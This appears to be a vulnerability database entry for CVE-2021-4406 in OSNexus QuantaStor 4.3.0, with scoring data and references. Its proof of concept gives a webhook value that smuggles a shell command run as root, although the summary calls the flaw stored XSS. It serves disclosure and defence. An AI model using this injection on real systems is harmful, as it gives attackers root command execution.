Vulnerability Details CVE-2021-4406
An authenticated attacker is able to create alerts that trigger a stored XSS attack.
POC
* go to the alert manager
* open the ITSM tab
* add a webhook with the URL/service token value
' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters)
* click add
* click apply
* create a test alert
* The test alert will run the command
“id | tee /tmp/ttttttddddssss” as root.
* after the test alert inspect
/tmp/ttttttddddssss it'll contain the ids of the root user.
Exploit prediction scoring system (EPSS) score
EPSS Score 0.001
EPSS Ranking 32.6%
CVSS Severity
CVSS v3 Score 9.1
References
- https://csirt.divd.nl/CVE-2021-4406
- https://csirt.divd.nl/DIVD-2021-00020/
- https://www.osnexus.com/products/software-defined-storage
- https://csirt.divd.nl/CVE-2021-4406
- https://www.divd.nl/DIVD-2021-00020
- https://www.osnexus.com/products/software-defined-storage
- https://csirt.divd.nl/cves/CVE-2021-4406/
Products affected by CVE-2021-4406
-
cpe:2.3:a:osnexus:quantastor:4.3.0